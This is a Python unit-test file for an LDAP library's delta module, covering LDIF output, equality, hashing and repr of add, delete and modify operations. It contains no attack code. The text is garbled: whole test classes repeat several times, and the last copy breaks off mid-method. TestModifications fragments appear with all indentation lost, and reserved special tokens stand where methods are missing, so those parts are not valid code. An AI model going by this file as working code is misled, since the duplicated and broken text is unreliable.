            'dc=example,dc=com', {'foo': ['bar', 'baz'], 'quux': ['thud']})
        self.assertEqual(
            b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n',
            op.asLDIF())

    def testAddOpEqualitySameEntry(self):
        """
        Operations wrapping identical entries compare equal.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['same', 'attributes']})
        self.assertEqual(left, right)

    def testAddOpInequalityDifferentEntry(self):
        """
        Operations wrapping entries with differing attributes are not equal.
        """
        left = self._makeOp('ou=First Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=First Team, dc=example,dc=com',
                             {'foo': ['other', 'attributes']})
        self.assertNotEqual(left, right)

    def testAddOpInequalityNoEntryObject(self):
        """
        An AddOp never equals an arbitrary non-entry object.
        """
        op = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                          {'foo': ['same', 'attributes']})
        self.assertNotEqual(op, {'foo': ['same', 'attributes']})

    def testAddOpHashSimilar(self):
        """
        Equal operations hash identically.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['same', 'attributes']})
        self.assertEqual(hash(left), hash(right))

    def testAddOpHashDifferent(self):
        """
        Unequal operations hash differently.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['one', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['other', 'attributes']})
        self.assertNotEqual(hash(left), hash(right))

    def testAddOp_DNExists(self):
        """
        It fails to perform the `add` operation for an existing entry.
        """
        root = self.getRoot()
        root.addChild(
            rdn='ou=Existing Team',
            attributes={'objectClass': ['a', 'b'], 'ou': ['HR']})
        op = self._makeOp('ou=Existing Team, dc=example,dc=com',
                          {'foo': ['dont', 'care']})
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)

    def testRepr(self):
        """
        repr() names the operation and embeds the wrapped entry.
        """
        op = self._makeOp('dc=example,dc=com',
                          {'bar': ['foo'], 'foo': ['bar']})
        self.assertEqual(
            repr(op),
            "AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))")
class TestDeleteOpLDIF(OperationTestCase):
    """
    Unit tests for DeleteOp.
    """

    def testAsLDIF(self):
        """
        It return the LDIF representation of the delete operation.
        """
        op = delta.DeleteOp('dc=example,dc=com')
        self.assertEqual(
            b'dn: dc=example,dc=com\nchangetype: delete\n\n', op.asLDIF())

    def testDeleteOpEqualitySameDN(self):
        """
        Operations built from entries with the same DN compare equal.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertEqual(left, right)

    def testDeleteOpEqualityEqualDN(self):
        """
        DeleteOp objects are equal if their DNs are equal, no matter
        whether they were built from a DN object, an entry, or a string.
        """
        from_dn = delta.DeleteOp(distinguishedname.DistinguishedName(
            stringValue='ou=Team,dc=example,dc=com'))
        from_entry = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com'))
        from_text = delta.DeleteOp('ou=Team, dc=example,dc=com')
        self.assertEqual(from_dn, from_entry)
        self.assertEqual(from_dn, from_text)

    def testDeleteOpInequalityDifferentEntry(self):
        """
        Operations targeting different DNs are not equal.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com'))
        self.assertNotEqual(left, right)

    def testDeleteOpInequalityNoEntryObject(self):
        """
        A DeleteOp never equals an arbitrary non-operation object.
        """
        op = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertNotEqual(op, 'ou=Team, dc=example,dc=com')

    def testDeleteOpHashSimilar(self):
        """
        Equal operations hash identically.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertEqual(hash(left), hash(right))

    def testDeleteOpHashDifferent(self):
        """
        Unequal operations hash differently.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com'))
        self.assertNotEqual(hash(left), hash(right))

    def testDeleteOp_DNNotFound(self):
        """
        Deleting a DN that is absent from the tree fails with
        LDAPNoSuchObject.
        """
        root = self.getRoot()
        op = delta.DeleteOp('cn=nope,dc=example,dc=com')
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testDeleteOpInvalidDN(self):
        """
        Invalid type of DN raises AssertionError
        """
        self.assertRaises(AssertionError, delta.DeleteOp, 0)

    def testRepr(self):
        """
        Getting string representation
        """
        op = delta.DeleteOp('dc=example,dc=com')
        self.assertEqual(repr(op), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
    """
    Unit tests for ModifyOp.
    """

    def testAsLDIF(self):
        """
        It will return a LDIF representation of the contained operations.
        """
        op = delta.ModifyOp(
            'cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
            [
                delta.Add('postaladdress',
                          ['123 Anystreet $ Sunnyvale, CA $ 94086']),
                delta.Delete('description'),
                delta.Replace('telephonenumber',
                              ['+1 408 555 1234', '+1 408 555 5678']),
                delta.Delete('facsimiletelephonenumber',
                             ['+1 408 555 9876']),
            ])
        self.assertEqual(
            b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n',
            op.asLDIF())

    def testInequalityDiffertnDN(self):
        """
        Modify operations for different DN are not equal.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=doe,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertNotEqual(left, right)

    def testInequalityDifferentModifications(self):
        """
        Modify operations with different modifications are not equal
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Add('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertNotEqual(left, right)

    def testInequalityNotModifyOP(self):
        """
        Modify operations are not equal with other object types.
        """
        op = delta.ModifyOp('cn=john,dc=example,dc=com',
                            [delta.Delete('description')])
        self.assertNotEqual('cn=john,dc=example,dc=com', op)

    def testInequalityDiffertnOperations(self):
        """
        Operations differing in both DN and modification are not equal.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=doe,dc=example,dc=com',
                               [delta.Delete('homeDirectory')])
        self.assertNotEqual(left, right)

    def testHashEquality(self):
        """
        Modify operations can be hashed and equal objects have the same
        hash.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertEqual(left, right)
        self.assertEqual(left.asLDIF(), right.asLDIF(),
                         'LDIF equality is a precondition for valid hash values')
        self.assertEqual(hash(left), hash(right))

    def testHashInequality(self):
        """
        Different modify operations have different hash values.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('homeDirectory')])
        self.assertNotEqual(left.asLDIF(), right.asLDIF())
        self.assertNotEqual(hash(left), hash(right))

    def testModifyOp_DNNotFound(self):
        """
        Patching a tree that lacks the target DN fails with
        LDAPNoSuchObject.
        """
        root = self.getRoot()
        op = delta.ModifyOp('cn=nope,dc=example,dc=com',
                            [delta.Add('foo', ['bar'])])
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testRepr(self):
        """
        Getting string representation
        """
        op = delta.ModifyOp('cn=john,dc=example,dc=com',
                            [delta.Delete('description')])
        self.assertEqual(
            repr(op),
            "ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])")
class TestModificationComparison(unittest.TestCase):
    """
    Equality semantics of the modification operation classes.
    """

    def testEquality_Add_True(self):
        # Same type, key, and values: equal.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = delta.Add('k', ['b', 'c', 'd'])
        self.assertEqual(left, right)

    def testEquality_AddVsDelete_False(self):
        # Different operation types never compare equal.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = delta.Delete('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, right)

    def testEquality_AttributeSet_False(self):
        # A modification is not interchangeable with a plain attribute set.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, right)

    def testEquality_List_False(self):
        # A modification is not equal to a bare list of its values.
        left = delta.Add('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, ['b', 'c', 'd'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestModifications(unittest.TestCase):
def setUp(self):
self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',
attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],
'sn': ['bar'], 'more': ['junk']})
<|reserved_special_token_0|>
def testAddNew(self):
mod = delta.Add('stuff', ['val1', 'val2'])
mod.patch(self.foo)
self.assertEqual(self.foo['stuff'], ['val1', 'val2'])
self.assertEqual(self.foo['cn'], ['foo', 'thud'])
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testReplace_Delete_NonExisting(self):
mod = delta.Replace('nonExisting', [])
mod.patch(self.foo)
self.assertFalse('stuff' in self.foo)
self.assertEqual(self.foo['sn'], ['bar'])
self.assertEqual(self.foo['more'], ['junk'])
class TestModificationOpLDIF(unittest.TestCase):
    """
    LDIF serialization of the individual modification operations.
    """

    def testAdd(self):
        mod = delta.Add('foo', ['bar', 'baz'])
        self.assertEqual(mod.asLDIF(), b'add: foo\nfoo: bar\nfoo: baz\n-\n')

    def testDelete(self):
        mod = delta.Delete('foo', ['bar', 'baz'])
        self.assertEqual(mod.asLDIF(), b'delete: foo\nfoo: bar\nfoo: baz\n-\n')

    def testDeleteAll(self):
        # Delete without values removes the whole attribute.
        mod = delta.Delete('foo')
        self.assertEqual(mod.asLDIF(), b'delete: foo\n-\n')

    def testReplace(self):
        mod = delta.Replace('foo', ['bar', 'baz'])
        self.assertEqual(mod.asLDIF(), b'replace: foo\nfoo: bar\nfoo: baz\n-\n')

    def testReplaceAll(self):
        # Replace without values clears the attribute.
        mod = delta.Replace('thud')
        self.assertEqual(mod.asLDIF(), b'replace: thud\n-\n')

    def testAddBase64(self):
        """
        LDIF attribute representation is base64 encoded
        if attribute value contains nonprintable characters
        or starts with reserved characters
        """
        mod = delta.Add('attr', [':value1', 'value\n\r2'])
        self.assertEqual(
            mod.asLDIF(),
            b'add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n')
class OperationTestCase(unittest.TestCase):
    """
    Shared base class for tests that operate on an LDAP tree.
    """

    def getRoot(self):
        """
        Return a fresh in-memory LDAP root for dc=example,dc=com.
        """
        root_dn = distinguishedname.DistinguishedName('dc=example,dc=com')
        return inmemory.ReadOnlyInMemoryLDAPEntry(dn=root_dn)
class TestAddOpLDIF(OperationTestCase):
    """
    Unit tests for `AddOp`.
    """

    def _makeOp(self, dn, attributes):
        # Helper keeping the individual tests focused on their assertions.
        return delta.AddOp(entry.BaseLDAPEntry(dn=dn, attributes=attributes))

    def testAsLDIF(self):
        """
        It will return the LDIF representation of the operation.
        """
        op = self._makeOp(
            'dc=example,dc=com', {'foo': ['bar', 'baz'], 'quux': ['thud']})
        self.assertEqual(
            b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n',
            op.asLDIF())

    def testAddOpEqualitySameEntry(self):
        """
        Operations wrapping identical entries compare equal.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['same', 'attributes']})
        self.assertEqual(left, right)

    def testAddOpInequalityDifferentEntry(self):
        """
        Operations wrapping entries with differing attributes are not equal.
        """
        left = self._makeOp('ou=First Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=First Team, dc=example,dc=com',
                             {'foo': ['other', 'attributes']})
        self.assertNotEqual(left, right)

    def testAddOpInequalityNoEntryObject(self):
        """
        An AddOp never equals an arbitrary non-entry object.
        """
        op = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                          {'foo': ['same', 'attributes']})
        self.assertNotEqual(op, {'foo': ['same', 'attributes']})

    def testAddOpHashSimilar(self):
        """
        Equal operations hash identically.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['same', 'attributes']})
        self.assertEqual(hash(left), hash(right))

    def testAddOpHashDifferent(self):
        """
        Unequal operations hash differently.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['one', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['other', 'attributes']})
        self.assertNotEqual(hash(left), hash(right))

    def testAddOp_DNExists(self):
        """
        It fails to perform the `add` operation for an existing entry.
        """
        root = self.getRoot()
        root.addChild(
            rdn='ou=Existing Team',
            attributes={'objectClass': ['a', 'b'], 'ou': ['HR']})
        op = self._makeOp('ou=Existing Team, dc=example,dc=com',
                          {'foo': ['dont', 'care']})
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)

    def testRepr(self):
        """
        repr() names the operation and embeds the wrapped entry.
        """
        op = self._makeOp('dc=example,dc=com',
                          {'bar': ['foo'], 'foo': ['bar']})
        self.assertEqual(
            repr(op),
            "AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))")
class TestDeleteOpLDIF(OperationTestCase):
    """
    Unit tests for DeleteOp.
    """

    def testAsLDIF(self):
        """
        It return the LDIF representation of the delete operation.
        """
        op = delta.DeleteOp('dc=example,dc=com')
        self.assertEqual(
            b'dn: dc=example,dc=com\nchangetype: delete\n\n', op.asLDIF())

    def testDeleteOpEqualitySameDN(self):
        """
        Operations built from entries with the same DN compare equal.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertEqual(left, right)

    def testDeleteOpEqualityEqualDN(self):
        """
        DeleteOp objects are equal if their DNs are equal, no matter
        whether they were built from a DN object, an entry, or a string.
        """
        from_dn = delta.DeleteOp(distinguishedname.DistinguishedName(
            stringValue='ou=Team,dc=example,dc=com'))
        from_entry = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com'))
        from_text = delta.DeleteOp('ou=Team, dc=example,dc=com')
        self.assertEqual(from_dn, from_entry)
        self.assertEqual(from_dn, from_text)

    def testDeleteOpInequalityDifferentEntry(self):
        """
        Operations targeting different DNs are not equal.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com'))
        self.assertNotEqual(left, right)

    def testDeleteOpInequalityNoEntryObject(self):
        """
        A DeleteOp never equals an arbitrary non-operation object.
        """
        op = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertNotEqual(op, 'ou=Team, dc=example,dc=com')

    def testDeleteOpHashSimilar(self):
        """
        Equal operations hash identically.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertEqual(hash(left), hash(right))

    def testDeleteOpHashDifferent(self):
        """
        Unequal operations hash differently.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com'))
        self.assertNotEqual(hash(left), hash(right))

    def testDeleteOp_DNNotFound(self):
        """
        Deleting a DN that is absent from the tree fails with
        LDAPNoSuchObject.
        """
        root = self.getRoot()
        op = delta.DeleteOp('cn=nope,dc=example,dc=com')
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testDeleteOpInvalidDN(self):
        """
        Invalid type of DN raises AssertionError
        """
        self.assertRaises(AssertionError, delta.DeleteOp, 0)

    def testRepr(self):
        """
        Getting string representation
        """
        op = delta.DeleteOp('dc=example,dc=com')
        self.assertEqual(repr(op), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
    """
    Unit tests for ModifyOp.
    """

    def testAsLDIF(self):
        """
        It will return a LDIF representation of the contained operations.
        """
        op = delta.ModifyOp(
            'cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
            [
                delta.Add('postaladdress',
                          ['123 Anystreet $ Sunnyvale, CA $ 94086']),
                delta.Delete('description'),
                delta.Replace('telephonenumber',
                              ['+1 408 555 1234', '+1 408 555 5678']),
                delta.Delete('facsimiletelephonenumber',
                             ['+1 408 555 9876']),
            ])
        self.assertEqual(
            b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n',
            op.asLDIF())

    def testInequalityDiffertnDN(self):
        """
        Modify operations for different DN are not equal.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=doe,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertNotEqual(left, right)

    def testInequalityDifferentModifications(self):
        """
        Modify operations with different modifications are not equal
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Add('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertNotEqual(left, right)

    def testInequalityNotModifyOP(self):
        """
        Modify operations are not equal with other object types.
        """
        op = delta.ModifyOp('cn=john,dc=example,dc=com',
                            [delta.Delete('description')])
        self.assertNotEqual('cn=john,dc=example,dc=com', op)

    def testInequalityDiffertnOperations(self):
        """
        Operations differing in both DN and modification are not equal.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=doe,dc=example,dc=com',
                               [delta.Delete('homeDirectory')])
        self.assertNotEqual(left, right)

    def testHashEquality(self):
        """
        Modify operations can be hashed and equal objects have the same
        hash.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('description')])
        self.assertEqual(left, right)
        self.assertEqual(left.asLDIF(), right.asLDIF(),
                         'LDIF equality is a precondition for valid hash values')
        self.assertEqual(hash(left), hash(right))

    def testHashInequality(self):
        """
        Different modify operations have different hash values.
        """
        left = delta.ModifyOp('cn=john,dc=example,dc=com',
                              [delta.Delete('description')])
        right = delta.ModifyOp('cn=john,dc=example,dc=com',
                               [delta.Delete('homeDirectory')])
        self.assertNotEqual(left.asLDIF(), right.asLDIF())
        self.assertNotEqual(hash(left), hash(right))

    def testModifyOp_DNNotFound(self):
        """
        Patching a tree that lacks the target DN fails with
        LDAPNoSuchObject.
        """
        root = self.getRoot()
        op = delta.ModifyOp('cn=nope,dc=example,dc=com',
                            [delta.Add('foo', ['bar'])])
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)

    def testRepr(self):
        """
        Getting string representation
        """
        op = delta.ModifyOp('cn=john,dc=example,dc=com',
                            [delta.Delete('description')])
        self.assertEqual(
            repr(op),
            "ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])")
class TestModificationComparison(unittest.TestCase):
    """
    Equality semantics of the modification operation classes.
    """

    def testEquality_Add_True(self):
        # Same type, key, and values: equal.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = delta.Add('k', ['b', 'c', 'd'])
        self.assertEqual(left, right)

    def testEquality_AddVsDelete_False(self):
        # Different operation types never compare equal.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = delta.Delete('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, right)

    def testEquality_AttributeSet_False(self):
        # A modification is not interchangeable with a plain attribute set.
        left = delta.Add('k', ['b', 'c', 'd'])
        right = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, right)

    def testEquality_List_False(self):
        # A modification is not equal to a bare list of its values.
        left = delta.Add('k', ['b', 'c', 'd'])
        self.assertNotEqual(left, ['b', 'c', 'd'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestModifications(unittest.TestCase):
def setUp(self):
self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',
attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],
'sn': ['bar'], 'more': ['junk']})
<|reserved_special_token_0|>
def testAddNew(self):
mod = delta.Add('stuff', ['val1', 'val2'])
mod.patch(self.foo)
self.assertEqual(self.foo['stuff'], ['val1', 'val2'])
self.assertEqual(self.foo['cn'], ['foo', 'thud'])
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testDelete_FailOnNonExistingAttributeType_All(self):
mod = delta.Delete('notexist', [])
self.assertRaises(KeyError, mod.patch, self.foo)
<|reserved_special_token_0|>
def testDelete_FailOnNonExistingAttributeValue(self):
mod = delta.Delete('cn', ['notexist'])
self.assertRaises(LookupError, mod.patch, self.foo)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testReplace_Delete_NonExisting(self):
mod = delta.Replace('nonExisting', [])
mod.patch(self.foo)
self.assertFalse('stuff' in self.foo)
self.assertEqual(self.foo['sn'], ['bar'])
self.assertEqual(self.foo['more'], ['junk'])
class TestModificationOpLDIF(unittest.TestCase):
    """
    LDIF serialization of the individual modification operations.
    """

    def testAdd(self):
        mod = delta.Add('foo', ['bar', 'baz'])
        self.assertEqual(mod.asLDIF(), b'add: foo\nfoo: bar\nfoo: baz\n-\n')

    def testDelete(self):
        mod = delta.Delete('foo', ['bar', 'baz'])
        self.assertEqual(mod.asLDIF(), b'delete: foo\nfoo: bar\nfoo: baz\n-\n')

    def testDeleteAll(self):
        # Delete without values removes the whole attribute.
        mod = delta.Delete('foo')
        self.assertEqual(mod.asLDIF(), b'delete: foo\n-\n')

    def testReplace(self):
        mod = delta.Replace('foo', ['bar', 'baz'])
        self.assertEqual(mod.asLDIF(), b'replace: foo\nfoo: bar\nfoo: baz\n-\n')

    def testReplaceAll(self):
        # Replace without values clears the attribute.
        mod = delta.Replace('thud')
        self.assertEqual(mod.asLDIF(), b'replace: thud\n-\n')

    def testAddBase64(self):
        """
        LDIF attribute representation is base64 encoded
        if attribute value contains nonprintable characters
        or starts with reserved characters
        """
        mod = delta.Add('attr', [':value1', 'value\n\r2'])
        self.assertEqual(
            mod.asLDIF(),
            b'add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n')
class OperationTestCase(unittest.TestCase):
    """
    Shared base class for tests that operate on an LDAP tree.
    """

    def getRoot(self):
        """
        Return a fresh in-memory LDAP root for dc=example,dc=com.
        """
        root_dn = distinguishedname.DistinguishedName('dc=example,dc=com')
        return inmemory.ReadOnlyInMemoryLDAPEntry(dn=root_dn)
class TestAddOpLDIF(OperationTestCase):
    """
    Unit tests for `AddOp`.
    """

    def _makeOp(self, dn, attributes):
        # Helper keeping the individual tests focused on their assertions.
        return delta.AddOp(entry.BaseLDAPEntry(dn=dn, attributes=attributes))

    def testAsLDIF(self):
        """
        It will return the LDIF representation of the operation.
        """
        op = self._makeOp(
            'dc=example,dc=com', {'foo': ['bar', 'baz'], 'quux': ['thud']})
        self.assertEqual(
            b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n',
            op.asLDIF())

    def testAddOpEqualitySameEntry(self):
        """
        Operations wrapping identical entries compare equal.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['same', 'attributes']})
        self.assertEqual(left, right)

    def testAddOpInequalityDifferentEntry(self):
        """
        Operations wrapping entries with differing attributes are not equal.
        """
        left = self._makeOp('ou=First Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=First Team, dc=example,dc=com',
                             {'foo': ['other', 'attributes']})
        self.assertNotEqual(left, right)

    def testAddOpInequalityNoEntryObject(self):
        """
        An AddOp never equals an arbitrary non-entry object.
        """
        op = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                          {'foo': ['same', 'attributes']})
        self.assertNotEqual(op, {'foo': ['same', 'attributes']})

    def testAddOpHashSimilar(self):
        """
        Equal operations hash identically.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['same', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['same', 'attributes']})
        self.assertEqual(hash(left), hash(right))

    def testAddOpHashDifferent(self):
        """
        Unequal operations hash differently.
        """
        left = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                            {'foo': ['one', 'attributes']})
        right = self._makeOp('ou=Duplicate Team, dc=example,dc=com',
                             {'foo': ['other', 'attributes']})
        self.assertNotEqual(hash(left), hash(right))

    def testAddOp_DNExists(self):
        """
        It fails to perform the `add` operation for an existing entry.
        """
        root = self.getRoot()
        root.addChild(
            rdn='ou=Existing Team',
            attributes={'objectClass': ['a', 'b'], 'ou': ['HR']})
        op = self._makeOp('ou=Existing Team, dc=example,dc=com',
                          {'foo': ['dont', 'care']})
        failure = self.failureResultOf(op.patch(root))
        self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)

    def testRepr(self):
        """
        repr() names the operation and embeds the wrapped entry.
        """
        op = self._makeOp('dc=example,dc=com',
                          {'bar': ['foo'], 'foo': ['bar']})
        self.assertEqual(
            repr(op),
            "AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))")
class TestDeleteOpLDIF(OperationTestCase):
    """
    Unit tests for DeleteOp.
    """

    def testAsLDIF(self):
        """
        It return the LDIF representation of the delete operation.
        """
        op = delta.DeleteOp('dc=example,dc=com')
        self.assertEqual(
            b'dn: dc=example,dc=com\nchangetype: delete\n\n', op.asLDIF())

    def testDeleteOpEqualitySameDN(self):
        """
        Operations built from entries with the same DN compare equal.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertEqual(left, right)

    def testDeleteOpEqualityEqualDN(self):
        """
        DeleteOp objects are equal if their DNs are equal, no matter
        whether they were built from a DN object, an entry, or a string.
        """
        from_dn = delta.DeleteOp(distinguishedname.DistinguishedName(
            stringValue='ou=Team,dc=example,dc=com'))
        from_entry = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com'))
        from_text = delta.DeleteOp('ou=Team, dc=example,dc=com')
        self.assertEqual(from_dn, from_entry)
        self.assertEqual(from_dn, from_text)

    def testDeleteOpInequalityDifferentEntry(self):
        """
        Operations targeting different DNs are not equal.
        """
        left = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        right = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com'))
        self.assertNotEqual(left, right)

    def testDeleteOpInequalityNoEntryObject(self):
        """
        A DeleteOp never equals an arbitrary non-operation object.
        """
        op = delta.DeleteOp(
            entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com'))
        self.assertNotEqual(op, 'ou=Team, dc=example,dc=com')

    def testDeleteOpHashSimilar(self):
        """
        Equal operations hash identically.
        """
